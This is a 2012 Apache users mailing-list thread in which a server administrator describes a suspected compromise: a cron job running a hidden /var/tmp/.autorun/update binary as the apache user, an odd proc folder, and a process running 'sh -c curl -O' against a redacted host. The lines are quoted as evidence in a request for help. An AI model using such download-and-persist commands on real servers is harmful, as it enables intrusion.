> Date: Mon, 9 Jan 2012 17:30:21 +0000
> From: tevans.uk@xxxxxxxxxxxxxx
> To: users@xxxxxxxxxxxxxxxx
> Subject: Re: FW: attack on apache
>
> On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
> <luisa2010@xxxxxxxxxxx> wrote:
> >
> >
> > ________________________________
> >
> > I didn't have any cronjobs but when I detected the attack I saw one in
> > /var/spool/cron
> > My logfile says
> > User apache:
> >
> > /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> >
> > personal crontab deleted: 56 Time(s)
> >
> > personal crontab listed: 1 Time(s)
> >
> > personal crontab replaced: 1 Time(s)
> >
> > Thanks
> >
>
> Google tells me that this is output from a cpanel perl script -
> probably a crontab editor. crontabs are not evidence of an attack.
>
> You need to show more details of what you think is happening, and why
> you think it is malicious.
> Cheers
> Tom

I think it is an attack because I found these commands running on my server (with owner apache)
/usr/local/apache/bin/httpd - DSFSL
sh -c curl -O http://xxxx
I also found a folder proc in /var/named/chroot. This folder is the same as /proc, is updated with the original /proc and I can't delete it.